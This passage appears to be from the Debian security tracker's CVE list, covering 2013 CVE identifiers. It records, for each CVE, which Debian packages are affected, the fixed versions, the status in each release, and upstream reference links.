CVE-2013-20001 (An issue was discovered in OpenZFS through 2.0.3. When an NFS share is ...)
	NOT-FOR-US: OpenZFS
CVE-2013-7491 (An issue was discovered in the DBI module before 1.628 for Perl. Stack ...)
	- libdbi-perl 1.628-1
	NOTE: https://github.com/perl5-dbi/dbi/commit/401f1221311c71f760e21c98772f0f7e3cbead1d
	NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=85562
CVE-2013-7490 (An issue was discovered in the DBI module before 1.632 for Perl. Using ...)
	- libdbi-perl 1.633-1
	NOTE: https://github.com/perl5-dbi/dbi/commit/a8b98e988d6ea2946f5f56691d6d5ead53f65766
	NOTE: https://rt.cpan.org/Public/Bug/Display.html?id=86744
CVE-2013-7489 (The Beaker library through 1.11.0 for Python is affected by deserializ ...)
	- beaker (bug #966197)
	[bullseye] - beaker (Minor issue)
	[buster] - beaker (Minor issue)
	[stretch] - beaker (Minor issue)
	NOTE: https://github.com/bbangert/beaker/issues/191
	NOTE: https://www.openwall.com/lists/oss-security/2020/05/14/11
CVE-2013-7488 (perl-Convert-ASN1 (aka the Convert::ASN1 module for Perl) through 0.27 ...)
	- libconvert-asn1-perl (bug #956186)
	[bullseye] - libconvert-asn1-perl (Minor issue)
	[buster] - libconvert-asn1-perl (Minor issue)
	[stretch] - libconvert-asn1-perl (Minor issue)
	[jessie] - libconvert-asn1-perl (Minor issue)
	NOTE: https://github.com/gbarr/perl-Convert-ASN1/issues/14
CVE-2013-7487 (On Swann DVR04B, DVR08B, DVR-16CIF, and DVR16B devices, raysharpdvr ap ...)
	NOT-FOR-US: Swann
CVE-2013-7486 (Cross-site scripting (XSS) vulnerability in the backend in Open-Xchang ...)
	NOT-FOR-US: Open-Xchange App Suite
CVE-2013-7485 (Cross-site scripting (XSS) vulnerability in the backend in Open-Xchang ...)
	NOT-FOR-US: Open-Xchange App Suite
CVE-2013-7484 (Zabbix before 5.0 represents passwords in the users table with unsalte ...)
	- zabbix 1:5.0.0+dfsg-1
	[buster] - zabbix (Minor issue)
	[stretch] - zabbix (Minor issue)
	[jessie] - zabbix (Minor issue)
	NOTE: https://support.zabbix.com/browse/ZBX-16551
	NOTE: https://support.zabbix.com/browse/ZBXNEXT-1898
	NOTE: https://www.zabbix.com/documentation/5.0/manual/introduction/whatsnew500#stronger_cryptography_for_passwords
CVE-2013-7483 (The slidedeck2 plugin before 2.3.5 for WordPress has file inclusion. ...)
	NOT-FOR-US: slidedeck2 plugin for WordPress
CVE-2013-7482 (The reflex-gallery plugin before 1.4.3 for WordPress has XSS. ...)
	NOT-FOR-US: reflex-gallery plugin for WordPress
CVE-2013-7481 (The contact-form-plugin plugin before 3.3.5 for WordPress has XSS. ...)
	NOT-FOR-US: contact-form-plugin plugin for WordPress
CVE-2013-7480 (The events-manager plugin before 5.3.6.1 for WordPress has XSS via the ...)
	NOT-FOR-US: events-manager plugin for WordPress
CVE-2013-7479 (The events-manager plugin before 5.3.9 for WordPress has XSS in the se ...)
	NOT-FOR-US: events-manager plugin for WordPress
CVE-2013-7478 (The events-manager plugin before 5.5 for WordPress has XSS via EM_Tick ...)
	NOT-FOR-US: events-manager plugin for WordPress
CVE-2013-7477 (The events-manager plugin before 5.5.2 for WordPress has XSS in the bo ...)
	NOT-FOR-US: events-manager plugin for WordPress
CVE-2013-7476 (The simple-fields plugin before 1.2 for WordPress has CSRF in the admi ...)
	NOT-FOR-US: simple-fields plugin for WordPress
CVE-2013-7475 (The contact-form-plugin plugin before 3.52 for WordPress has XSS. ...)
	NOT-FOR-US: contact-form-plugin plugin for WordPress
CVE-2013-7474 (Windu CMS 2.2 allows XSS via the name parameter to admin/content/edit ...)
	NOT-FOR-US: Windu CMS
CVE-2013-7473 (Windu CMS 2.2 allows CSRF via admin/users/?mn=admin.message.error to a ...)
	NOT-FOR-US: Windu CMS
CVE-2013-7472 (The "Count per Day" plugin before 3.2.6 for WordPress allows XSS via t ...)
	NOT-FOR-US: "Count per Day" plugin for WordPress
CVE-2013-7471 (An issue was discovered in soap.cgi?service=WANIPConn1 on D-Link DIR-8 ...)
	NOT-FOR-US: D-Link
CVE-2013-7470 (cipso_v4_validate in include/net/cipso_ipv4.h in the Linux kernel befo ...)
	- linux 3.11.7-1
	NOTE: Fixed by: https://git.kernel.org/linus/f2e5ddcc0d12f9c4c7b254358ad245c9dddce13b
CVE-2013-7469 (Seafile through 6.2.11 always uses the same Initialization Vector (IV) ...)
	- seafile 7.0.2-1 (bug #923009)
	[buster] - seafile (Minor issue)
	NOTE: https://github.com/haiwen/seafile/issues/350
CVE-2013-7468 (Simple Machines Forum (SMF) 2.0.4 allows PHP Code Injection via the in ...)
	NOT-FOR-US: Simple Machines Forum (SMF)
CVE-2013-7467 (Simple Machines Forum (SMF) 2.0.4 allows XSS via the index.php?action= ...)
	NOT-FOR-US: Simple Machines Forum (SMF)
CVE-2013-7466 (Simple Machines Forum (SMF) 2.0.4 allows local file inclusion, with re ...)
	NOT-FOR-US: Simple Machines Forum (SMF)
CVE-2013-7465 (Ice Cold Apps Servers Ultimate 6.0.2(12) does not require authenticati ...)
	NOT-FOR-US: Ice Cold Apps Servers Ultimate
CVE-2013-7464 (In csrf-magic before 1.0.4, if $GLOBALS['csrf']['secret'] is not confi ...)
	- zoneminder (Vulnerable code never in an embedded copy version for zoneminder)
	- cacti (Vulnerable code never in any release including embedded copy, i.e. pre 1.0.4)
	NOTE: Issue is in embedded csrf-magic
	NOTE: https://repo.or.cz/csrf-magic.git/commit/9d2537f70d58b16aeba89779aaf1573b8d618e11 (v1.0.4)
CVE-2013-7463 (The aescrypt gem 1.0.0 for Ruby does not randomize the CBC IV for use ...)
	NOT-FOR-US: aescrypt gem for Ruby
CVE-2013-7462 (A directory traversal vulnerability in the web application in McAfee ( ...)
	NOT-FOR-US: Intel antivirus
CVE-2013-7461 (A write protection and execution bypass vulnerability in McAfee (now I ...)
	NOT-FOR-US: Intel antivirus
CVE-2013-7460 (A write protection and execution bypass vulnerability in McAfee (now I ...)
	NOT-FOR-US: Intel antivirus
CVE-2013-7459 (Heap-based buffer overflow in the ALGnew function in block_templace.c ...)
	{DLA-773-1}
	- python-crypto 2.6.1-7 (bug #849495)
	[jessie] - python-crypto 2.6.1-5+deb8u1
	NOTE: https://github.com/dlitz/pycrypto/issues/176
	NOTE: Fixed by: https://github.com/dlitz/pycrypto/commit/8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4
	NOTE: All users of pycrypto's AES module in Debian that allow the mode
	NOTE: of operation to be specified from outside check for ECB explicitly
	NOTE: and create the objects without specifying an IV.
CVE-2013-7458 (linenoise, as used in Redis before 3.2.3, uses world-readable permissi ...)
	{DSA-3634-1 DLA-577-1}
	- redis 2:3.2.1-4 (bug #832460)
	NOTE: https://www.openwall.com/lists/oss-security/2016/07/28/1
CVE-2013-7457 (Unspecified vulnerability in the Qualcomm components in Android before ...)
	NOT-FOR-US: Qualcomm components for Android
CVE-2013-7456 (gd_interpolation.c in the GD Graphics Library (aka libgd) before 2.1.1 ...)
	{DSA-3602-1 DSA-3587-1}
	- libgd2 2.1.1-1
	[wheezy] - libgd2 (Vulnerable code not present)
	NOTE: https://github.com/libgd/libgd/commit/4f65a3e4eedaffa1efcf9ee1eb08f0b504fbc31a (gd-2.1.1)
	- php7.0 7.0.7-1 (unimportant)
	- php5 5.6.22+dfsg-1 (unimportant)
	NOTE: Starting with 5.4.0-1 Debian uses the system copy of libgd
	NOTE: PHP bug: https://bugs.php.net/bug.php?id=72227
	NOTE: Fixed in 7.0.7, 5.6.22, 5.5.36
	NOTE: https://www.openwall.com/lists/oss-security/2016/05/25/3
CVE-2013-7455 (Double free vulnerability in the DefaultICCintents function in cmscnvr ...)
	- lcms2 2.6-1
	[wheezy] - lcms2 (vulnerable code not present, no cmsPipelineFree(Lut); in Error:-part)
	NOTE: https://www.kb.cert.org/vuls/id/369800
	NOTE: https://github.com/mm2/Little-CMS/commit/fefaaa43c382eee632ea3ad0cfa915335140e1db#diff-189a94f0a7a47efdd43f5567e27a973b
CVE-2013-7454 (The validator module before 1.1.0 for Node.js allows remote attackers ...)
	- validator.js (Fixed before initial release)
CVE-2013-7453 (The validator module before 1.1.0 for Node.js allows remote attackers ...)
	- validator.js (Fixed before initial release)
CVE-2013-7452 (The validator module before 1.1.0 for Node.js allows remote attackers ...)
	- validator.js (Fixed before initial release)
CVE-2013-7451 (The validator module before 1.1.0 for Node.js allows remote attackers ...)
	- validator.js (Fixed before initial release)
CVE-2013-7450 (Pulp before 2.3.0 uses the same the same certificate authority key and ...)
	NOT-FOR-US: Pulp (Red Hat)
CVE-2013-7448 (Directory traversal vulnerability in wiki.c in didiwiki allows remote ...)
	{DSA-3485-1 DLA-424-1}
	- didiwiki 0.5-12 (bug #815111)
	NOTE: https://github.com/OpenedHand/didiwiki/pull/1/files
	NOTE: https://www.openwall.com/lists/oss-security/2016/02/19/4
CVE-2013-7447 (Integer overflow in the gdk_cairo_set_source_pixbuf function in gdk/gd ...)
	{DLA-419-1}
	- gtk+2.0 2.24.30-1.1 (bug #799275)
	[jessie] - gtk+2.0 2.24.25-3+deb8u1
	[wheezy] - gtk+2.0 (Minor issue; can be fixed via wheezy-pu)
	- gtk+3.0 3.10.7-1 (bug #818090)
	[wheezy] - gtk+3.0 3.4.2-7+deb7u1
	NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=703220
	NOTE: Fixed by: https://git.gnome.org/browse/gtk+/commit?id=894b1ae76a32720f4bb3d39cf460402e3ce331d6
CVE-2013-7446 (Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel ...)
	{DSA-3426-1 DLA-360-1}
	- linux 4.2.6-2
	- linux-2.6
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1273845
	NOTE: https://groups.google.com/forum/#!topic/syzkaller/3twDUI4Cpm8
	NOTE: https://www.openwall.com/lists/oss-security/2015/11/18/9
	NOTE: Introduced by: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ec0d215f9420564fc8286dcf93d2d068bb53a07e (v2.6.26-rc9)
	NOTE: Fixed by: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=7d267278a9ece963d77eefec61630223fce08c6c (v4.4-rc4)
CVE-2013-7445 (The Direct Rendering Manager (DRM) subsystem in the Linux kernel throu ...)
	- linux
	[bullseye] - linux (Minor issue, requires invasive changes)
	[buster] - linux (Minor issue, requires invasive changes)
	[stretch] - linux (Minor issue, requires invasive changes)
	[jessie] - linux (Minor issue, requires invasive changes)
	[wheezy] - linux (Minor issue, requires invasive changes)
	- linux-2.6
	NOTE: https://bugzilla.kernel.org/show_bug.cgi?id=60533
CVE-2013-7444 (The Special:Contributions page in MediaWiki before 1.22.0 allows remot ...)
	- mediawiki 1:1.25.5-1 (bug #799096)
	[wheezy] - mediawiki (Minor issues)
	[squeeze] - mediawiki (Not supported in Squeeze LTS)
	NOTE: https://phabricator.wikimedia.org/T106893
	NOTE: https://github.com/wikimedia/mediawiki/commit/dc2966bd05b69321300c63fd0bd78e7c78ecea6e
CVE-2013-7443 (Buffer overflow in the skip-scan optimization in SQLite 3.8.2 allows r ...)
	- sqlite3 3.8.3-1
	[wheezy] - sqlite3 (Vulnerable code introduced in 3.8.2)
	[squeeze] - sqlite3 (Vulnerable code introduced in 3.8.2)
	NOTE: Fixed by: https://www.sqlite.org/src/info/ac5852d6403c9c96
	NOTE: Introduced by: https://www.sqlite.org/src/info/b0bb975c0986fe01
	NOTE: https://www.sqlite.org/src/info/520070ec7fbaac
	NOTE: https://www.openwall.com/lists/oss-security/2015/07/14/5
CVE-2013-7442 (GE Healthcare Centricity PACS Workstation 4.0 and 4.0.1 has a password ...)
	NOT-FOR-US: GE Healthcare Centricity PACS Workstation
CVE-2013-7440 (The ssl.match_hostname function in CPython (aka Python) before 2.7.9 a ...)
	- python3.4 3.4~b1-4
	- python3.3 3.3.3-1
	- python3.2
	[wheezy] - python3.2 (Minor issue, too intrusive to backport)
	- python3.1
	[squeeze] - python3.1 (Minor issue)
	- python2.7 2.7.9-1
	[wheezy] - python2.7 (Minor issue, too intrusive to backport)
	- python2.6
	[wheezy] - python2.6 (Minor issue, too intrusive to backport)
	[squeeze] - python2.6 (Minor issue)
	- python2.5
	[squeeze] - python2.5 (Minor issue)
	NOTE: https://bugs.python.org/issue17997#msg194950
	NOTE: https://hg.python.org/cpython/rev/10d0edadbcdd
	NOTE: The CVE is only about refusing multiple wildcards. Backporting that part only is not so difficult.
CVE-2013-7439 (Multiple off-by-one errors in the (1) MakeBigReq and (2) SetReqLen mac ...)
	{DSA-3224-1 DLA-199-1}
	- libx11 2:1.6.0-1
	NOTE: http://cgit.freedesktop.org/xorg/lib/libX11/commit/?id=39547d600a13713e15429f49768e54c3173c828d
	NOTE: https://bugs.freedesktop.org/show_bug.cgi?id=56508
	NOTE: https://www.openwall.com/lists/oss-security/2015/04/08/4
	NOTE: The following packages will be recompiled after the release of
	NOTE: the DSA for wheezy and the DLA for squeeze:
	NOTE: libxrender (1:0.9.7-1+deb7u2 / 0.9.6-1+squeeze1+build1)
	NOTE: libxi (TBD / 1.3-8+build1)
	NOTE: libxfixes (TBD / 4.0.5-1+squeeze1+build1)
	NOTE: libxrandr (TBD / 1.3.0-3+squeeze1+build1)
	NOTE: libsdl1.2 (TBD / 1.2.14-6.1+build1)
	NOTE: libxv (TBD / 1.0.5-1+squeeze1+build1)
	NOTE: libxp (TBD / 1.0.0.xsf1-2+squeeze1+build1)
	NOTE: libxext (TBD / 1.1.2-1+squeeze1+build1)
	NOTE: xserver-xorg-video-vmware (TBD / 11.0.1-2+build1)
	NOTE: cairo (TBD / 1.8.10-6+build1)
	NOTE: open-vm-tools (TBD / 8.4.2-261024-1+build1)
	NOTE: wine-gecko-1.4 (wheezy)
	NOTE: list completed by analyzing http://codesearch.debian.net/results/SetReqLen and http://codesearch.debian.net/results/MakeBigReq
CVE-2013-7438 (Multiple buffer overflows in pbm212030 allow remote attackers to cause ...)
	NOT-FOR-US: pbm2l2030
	NOTE: http://www.openprinting.org/driver/pbm2l2030/ (typo in the official CVE description)
CVE-2013-7441 (The modern style negotiation in Network Block Device (nbd-server) 2.9. ...)
	{DSA-3271-1}
	- nbd 1:3.4-1 (bug #781547)
	[squeeze] - nbd (Named export introduced in 2.9.17)
	NOTE: https://www.openwall.com/lists/oss-security/2015/05/19/6
CVE-2013-7435 (The open-ils.pcrud endpoint in Evergreen before 2.5.9, 2.6.x before 2. ...)
	NOT-FOR-US: Evergreen library
CVE-2013-7434
	RESERVED
CVE-2013-7433 (Cross-site scripting (XSS) vulnerability in the Googlemaps plugin befo ...)
	NOT-FOR-US: Googlemaps plugin for Joomla!
CVE-2013-7432 (The Googlemaps plugin before 3.1 for Joomla! allows remote attackers t ...)
	NOT-FOR-US: Googlemaps plugin for Joomla!
CVE-2013-7431 (Full path disclosure in the Googlemaps plugin before 3.1 for Joomla!. ...)
	NOT-FOR-US: Googlemaps plugin for Joomla!
CVE-2013-7430 (Cross-site scripting (XSS) vulnerability in the Googlemaps plugin befo ...)
	NOT-FOR-US: Googlemaps plugin for Joomla!
CVE-2013-7429 (The Googlemaps plugin before 3.1 for Joomla! allows remote attackers t ...)
	NOT-FOR-US: Googlemaps plugin for Joomla!
CVE-2013-7428 (The Googlemaps plugin before 3.1 for Joomla! allows remote attackers t ...)
	NOT-FOR-US: Googlemaps plugin for Joomla!
CVE-2013-7427
	RESERVED
CVE-2013-7436 (noVNC before 0.5 does not set the secure flag for a cookie in an https ...)
	- novnc 1:0.4+dfsg+1+20131010+gitf68af8af3d-4 (bug #778618)
	[wheezy] - novnc (Only an issue in combination with later OpenStack components)
	NOTE: https://github.com/kanaka/noVNC/commit/ad941faddead705cd611921730054767a0b32dcd
	NOTE: https://www.openwall.com/lists/oss-security/2015/02/17/1
CVE-2013-7425
	RESERVED
CVE-2013-XXXX [TOCTOU race when expanding JAR files]
	- libbluray 0.7.0-1 (unimportant)
	NOTE: CVE Request: https://www.openwall.com/lists/oss-security/2015/02/06/9
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=959433
	NOTE: libbluray is only in wheezy and later and the issue is neutered by the kernel hardening for /tmp
	NOTE: Affected code removed in 0.7.0-1
CVE-2013-7437 (Multiple integer overflows in potrace 1.11 allow remote attackers to c ...)
	{DLA-675-1}
	- potrace 1.12-1 (bug #778646)
	[squeeze] - potrace (Minor issue)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=955808
	NOTE: https://www.openwall.com/lists/oss-security/2015/02/06/12
CVE-2013-7449 (The ssl_do_connect function in common/server.c in HexChat before 2.10. ...)
	- xchat 2.8.8-10 (bug #776609)
	[jessie] - xchat (Minor issue)
	[wheezy] - xchat (Minor issue)
	[squeeze] - xchat (Minor issue)
	- xchat-gnome (bug #829730)
	[wheezy] - xchat-gnome (Minor issue)
	[squeeze] - xchat-gnome (Minor issue)
	- hexchat 2.10.2-1 (bug #818009)
	[jessie] - hexchat 2.10.1-1+deb8u1
	NOTE: https://github.com/hexchat/hexchat/issues/524
	NOTE: https://github.com/hexchat/hexchat/commit/c9b63f7f9be01692b03fa15275135a4910a7e02d (v2.12.0)
	NOTE: https://github.com/hexchat/hexchat/commit/c99f2ba645d1f4d01d6d2bb0cc1238825e15c604 (v2.10.2)
CVE-2013-7426 (Insecure Temporary file vulnerability in /tmp/kamailio_fifo in kamaili ...)
	- kamailio 4.0.2-1 (bug #712083)
CVE-2013-7424 (The getaddrinfo function in glibc before 2.15, when compiled with libi ...)
	{DSA-3169-1 DLA-165-1}
	- glibc 2.15-1
	- eglibc 2.15-1
	NOTE: http://seclists.org/oss-sec/2015/q1/306
	NOTE: Upstream fix: https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=2e96f1c7
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=981942
CVE-2013-7423 (The send_dg function in resolv/res_send.c in GNU C Library (aka glibc ...)
	{DLA-165-1}
	- glibc 2.19-1 (bug #722075)
	- eglibc
	[wheezy] - eglibc 2.13-38+deb7u5
	NOTE: Fix: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f9d2d03254a58d92635a311a42253eeed5a40a47
	NOTE: Upstream report: https://sourceware.org/bugzilla/show_bug.cgi?id=15946
	NOTE: https://www.openwall.com/lists/oss-security/2015/01/28/16
CVE-2013-7421 (The Crypto API in the Linux kernel before 3.18.5 allows local users to ...)
	{DSA-3170-1}
	- linux 3.16.7-ckt4-2
	- linux-2.6
	[squeeze] - linux-2.6 (Introduced in v2.6.38-rc1)
	NOTE: https://lkml.org/lkml/2013/3/4/70
	NOTE: https://plus.google.com/+MathiasKrause/posts/PqFCo4bfrWu
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5d26a105b5a7 (v3.19-rc1)
CVE-2013-7422 (Integer underflow in regcomp.c in Perl before 5.20, as used in Apple O ...)
	- perl 5.20.0-1 (bug #776046)
	[wheezy] - perl (Minor issue)
	[squeeze] - perl (Minor issue)
	NOTE: https://rt.perl.org/Public/Bug/Display.html?id=119505
	NOTE: https://www.openwall.com/lists/oss-security/2015/01/23/9
CVE-2013-XXXX [lhasa: several directory traversal vulnerabilities]
	- lhasa 0.2.0-1
	[wheezy] - lhasa (Minor issue)
CVE-2013-7420 (Buffer overflow in Hancom Office 2010 SE allows remote attackers to ex ...)
	NOT-FOR-US: Hancom Office 2010 SE
CVE-2013-7419 (Cross-site scripting (XSS) vulnerability in includes/refreshDate.php i ...)
	NOT-FOR-US: Joomlaskin JS Multi Hotel (aka JS MultiHotel and Js-Multi-Hotel) plugin for WordPress
CVE-2013-7418 (cgi-bin/iptablesgui.cgi in IPCop (aka IPCop Firewall) before 2.1.5 all ...)
	NOT-FOR-US: IPCop
CVE-2013-7417 (Cross-site scripting (XSS) vulnerability in cgi-bin/ipinfo.cgi in IPCo ...)
	NOT-FOR-US: IPCop
CVE-2013-7416 (canto_curses/guibase.py in Canto Curses before 0.9.0 allows remote fee ...)
	- canto (bug #731582)
	[wheezy] - canto (Vulnerable code not present)
	[squeeze] - canto (Vulnerable code not present)
CVE-2013-7415
	RESERVED
CVE-2013-7414
	RESERVED
CVE-2013-7413
	RESERVED
CVE-2013-7412
	RESERVED
CVE-2013-7411
	RESERVED
CVE-2013-7410
	RESERVED
CVE-2013-7409 (Buffer overflow in ALLPlayer 5.6.2 through 5.8.1 allows remote attacke ...)
	NOT-FOR-US: ALLPlayer
CVE-2013-7408 (F5 BIG-IP Analytics 11.x before 11.4.0 uses a predictable session cook ...)
	NOT-FOR-US: F5 BIG-IP Analytics
CVE-2013-7407 (Cross-site request forgery (CSRF) vulnerability in the MRBS module for ...)
	NOT-FOR-US: Drupal module MRBS
CVE-2013-7406 (SQL injection vulnerability in the MRBS module for Drupal allows remot ...)
	NOT-FOR-US: Drupal module MRBS
CVE-2013-7405 (The Ad Hoc Reporting feature in GE Healthcare Centricity DMS 4.2 has a ...)
	NOT-FOR-US: GE Healthcare Centricity DMS
CVE-2013-7404 (GE Healthcare Discovery NM 750b has a password of 2getin for the insit ...)
	NOT-FOR-US: GE Healthcare Discovery NM 750b
CVE-2013-7403
	RESERVED
	NOT-FOR-US: WordPress plugin wp-video-commando
CVE-2013-7400 (The Direct Mail (direct_mail) extension before 3.1.2 for TYPO3 allows ...)
	NOT-FOR-US: TYPO3 extension direct_mail
CVE-2013-7399
	RESERVED
CVE-2013-7402 (Multiple unspecified vulnerabilities in request.c in c-icap 0.2.x allo ...)
	{DSA-3101-1}
	- c-icap 1:0.3.1-1
	NOTE: http://sourceforge.net/p/c-icap/code/1018/
	NOTE: http://sourceforge.net/p/c-icap/code/1021
CVE-2013-7401 (The parse_request function in request.c in c-icap 0.2.x allows remote ...)
	{DSA-3101-1}
	- c-icap 1:0.3.1-1
	NOTE: http://sourceforge.net/p/c-icap/bugs/59/
	NOTE: http://sourceforge.net/p/c-icap/code/1018/
CVE-2013-7398 (main/java/com/ning/http/client/AsyncHttpClientConfig.java in Async Htt ...)
	- async-http-client (Vulnerable code not present, bug #773364)
	NOTE: https://github.com/AsyncHttpClient/async-http-client/issues/197
	NOTE: https://github.com/AsyncHttpClient/async-http-client/commit/3c9152e2c75f7e8b654beec40383748a14c6b51b
CVE-2013-7397 (Async Http Client (aka AHC or async-http-client) before 1.9.0 skips X. ...)
	- async-http-client 1.6.5-3
	[wheezy] - async-http-client (Minor issue)
	NOTE: https://github.com/AsyncHttpClient/async-http-client/issues/352
CVE-2013-7396
	RESERVED
CVE-2013-7395 (ZOLL Defibrillator / Monitor X Series has a default (1) supervisor pas ...)
	NOT-FOR-US: ZOLL Defibrillator / Monitor X Series
CVE-2013-7394 (The "runshellscript echo.sh" script in Splunk before 5.0.5 allows remo ...)
	NOT-FOR-US: Splunk
CVE-2013-7393 (The daemonize.py module in Subversion 1.8.0 before 1.8.2 allows local ...)
	- subversion 1.8.5-1 (unimportant)
	NOTE: Optional admin-side utilities in Subversion 1.8.x
	NOTE: split from CVE-2013-4262
CVE-2013-7392 (Gitlist allows remote attackers to execute arbitrary commands via shel ...)
	- gitlist (bug #750368)
CVE-2013-7391 (The Entity API module 7.x-1.x before 7.x-1.2 for Drupal, when using th ...)
	NOT-FOR-US: Drupal contributed module Entity API
CVE-2013-7390 (Unrestricted file upload vulnerability in AgentLogUploadServlet in Man ...)
	NOT-FOR-US: ManageEngine DesktopCentral
CVE-2013-7389 (Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 ...)
	NOT-FOR-US: D-Link router
CVE-2013-7388 (Heap-based buffer overflow in paintlib, as used in Trimble SketchUp (f ...)
	NOT-FOR-US: Trimble SketchUp
CVE-2013-7387 (Session fixation vulnerability in DataLife Engine (DLE) 9.7 and earlie ...)
	NOT-FOR-US: DataLife Engine
CVE-2013-7386 (Format string vulnerability in the PROJECT::write_account_file functio ...)
	- boinc 7.1.10+dfsg-1 (low)
	[squeeze] - boinc (Minor issue)
	[wheezy] - boinc (Minor issue)
CVE-2013-7385 (LiveZilla 5.1.2.1 and earlier includes the MD5 hash of the operator pa ...)
	NOT-FOR-US: LiveZilla
CVE-2013-7384 (UnrealIRCd 3.2.10 before 3.2.10.2 allows remote attackers to cause a d ...)
	- unrealircd (bug #515130)
CVE-2013-7382 (VICIDIAL dialer (aka Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1, and e ...)
	NOT-FOR-US: VICIDIAL
CVE-2013-7381 (libnotify before 1.0.4 for Node.js allows remote attackers to execute ...)
	NOT-FOR-US: libnotify for Node.js
CVE-2013-7380 (The Etherpad Lite ep_imageconvert Plugin has a Remote Command Injectio ...)
	NOT-FOR-US: Etherpad Lite ep_imageconvert Plugin
CVE-2013-7379 (The admin API in the tomato module before 0.0.6 for Node.js does not p ...)
	NOT-FOR-US: tomato module for Node.js
CVE-2013-7378 (scripts/email.coffee in the Hubot Scripts module before 2.4.4 for Node ...)
	NOT-FOR-US: Hubot Scripts module for Node.js
CVE-2013-7377 (The codem-transcode module before 0.5.0 for Node.js, when ffprobe is e ...)
	NOT-FOR-US: codem-transcode Node module
CVE-2013-7376 (Multiple cross-site request forgery (CSRF) vulnerabilities in OpenX 2. ...)
	NOT-FOR-US: OpenX
CVE-2013-7383 (x2gocleansessions in X2Go Server before 4.0.0.8 and 4.0.1.x before 4.0 ...)
	- x2goserver (Fixed with first upload to Debian)
	NOTE: Fixed by: http://code.x2go.org/gitweb?p=x2goserver.git;a=commit;h=5a2aa0c36ef7a57d87e3bb6f7c6b2558ed5430f7 (4.0.1.10)
	NOTE: Fixed by: http://code.x2go.org/gitweb?p=x2goserver.git;a=commit;h=b03665513ab1969b069c1351fe17cbb8b5fca256 (4.0.0.8)
	NOTE: Fixed by: http://code.x2go.org/gitweb?p=x2goserver.git;a=commit;h=8347d3fef0e5cbabe4aa48f503612fa7b9d078f8 (4.0.0.8)
	NOTE: Fixed by: http://code.x2go.org/gitweb?p=x2goserver.git;a=commit;h=bf44925ecccda436caa1cfc34f89eced9c1bd104 (4.0.0.8)
CVE-2013-7375 (SQL injection vulnerability in includes/classes/Authenticate.class.php ...)
	NOT-FOR-US: PHP-Fusion
CVE-2013-7373 (Android before 4.4 does not properly arrange for seeding of the OpenSS ...)
	NOT-FOR-US: Android
CVE-2013-7372 (The engineNextBytes function in classlib/modules/security/src/main/jav ...)
	NOT-FOR-US: Android
CVE-2013-7369 (SQL injection vulnerability in an unspecified DLL in the FSDBCom Activ ...)
	NOT-FOR-US: F-Secure Anti-Virus
CVE-2013-7374 (The Ubuntu Date and Time Indicator (aka indicator-datetime) 13.10.0+13 ...)
	NOT-FOR-US: indicator-datetime
CVE-2013-7371 (node-connects before 2.8.2 has cross site scripting in Sencha Labs Con ...)
	- node-connect (Only applies when incomplete fix applied)
	NOTE: CVE for incomplete fix for CVE-2013-7370, fixed in 2.8.2
CVE-2013-7370 (node-connect before 2.8.1 has XSS in the Sencha Labs Connect middlewar ...)
	- node-connect 3.0.0-1 (bug #744374)
CVE-2013-7368 (Multiple cross-site scripting (XSS) vulnerabilities in Gnew 2013.1 all ...)
	NOT-FOR-US: Gnew
CVE-2013-7367 (SAP Enterprise Portal does not properly restrict access to the Federat ...)
	NOT-FOR-US: SAP
CVE-2013-7366 (The SAP Software Deployment Manager (SDM), in certain unspecified cond ...)
	NOT-FOR-US: SAP
CVE-2013-7365 (Cross-site scripting (XSS) vulnerability in SAP Enterprise Portal allo ...)
	NOT-FOR-US: SAP
CVE-2013-7364 (An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver d ...)
	NOT-FOR-US: SAP
CVE-2013-7363 (Unspecified vulnerability in the Diagnostics (SMD) agent in SAP Soluti ...)
	NOT-FOR-US: SAP
CVE-2013-7362 (An unspecified RFC function in SAP CCMS Agent allows remote attackers ...)
	NOT-FOR-US: SAP
CVE-2013-7361 (Directory traversal vulnerability in SAP CMS and CM Services allows at ...)
	NOT-FOR-US: SAP
CVE-2013-7360 (Unspecified vulnerability in SAP adminadapter allows remote attackers ...)
	NOT-FOR-US: SAP
CVE-2013-7359 (Unspecified vulnerability in SAP Mobile Infrastructure allows remote a ...)
	NOT-FOR-US: SAP
CVE-2013-7358 (Unspecified vulnerability in SAP Guided Procedures Archive Monitor all ...)
	NOT-FOR-US: SAP
CVE-2013-7357 (Unspecified vulnerability in the configuration service in SAP J2EE Eng ...)
	NOT-FOR-US: SAP
CVE-2013-7356 (Unspecified vulnerability in the SAP CCMS / Database Monitors for Orac ...)
	NOT-FOR-US: SAP
CVE-2013-7355 (SQL injection vulnerability in SAP BI Universal Data Integration allow ...)
	NOT-FOR-US: SAP
CVE-2013-7354 (Multiple integer overflows in libpng before 1.5.14rc03 allow remote at ...)
	- libpng (Only affects 1.5 and later)
	NOTE: http://sourceforge.net/p/png-mng/mailman/message/32215052/
	NOTE: http://sourceforge.net/p/libpng/bugs/199/
	- libpng1.6 1.6.10-1
CVE-2013-7353 (Integer overflow in the png_set_unknown_chunks function in libpng/pngs ...)
	- libpng (Only affects 1.5 and later)
	NOTE: http://sourceforge.net/p/png-mng/mailman/message/32215052/
	NOTE: http://sourceforge.net/p/libpng/bugs/199/
	- libpng1.6 1.6.10-1
CVE-2013-7352 (Cross-site request forgery (CSRF) vulnerability in blogs/admin.php in ...)
	NOT-FOR-US: b2evolution
CVE-2013-7350 (Multiple unspecified vulnerabilities in Check Point Security Gateway 8 ...)
	NOT-FOR-US: Check Point Security Gateway
CVE-2013-7349 (Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote att ...)
	NOT-FOR-US: Gnew
CVE-2013-7346 (Cross-site request forgery (CSRF) vulnerability in Symphony CMS before ...)
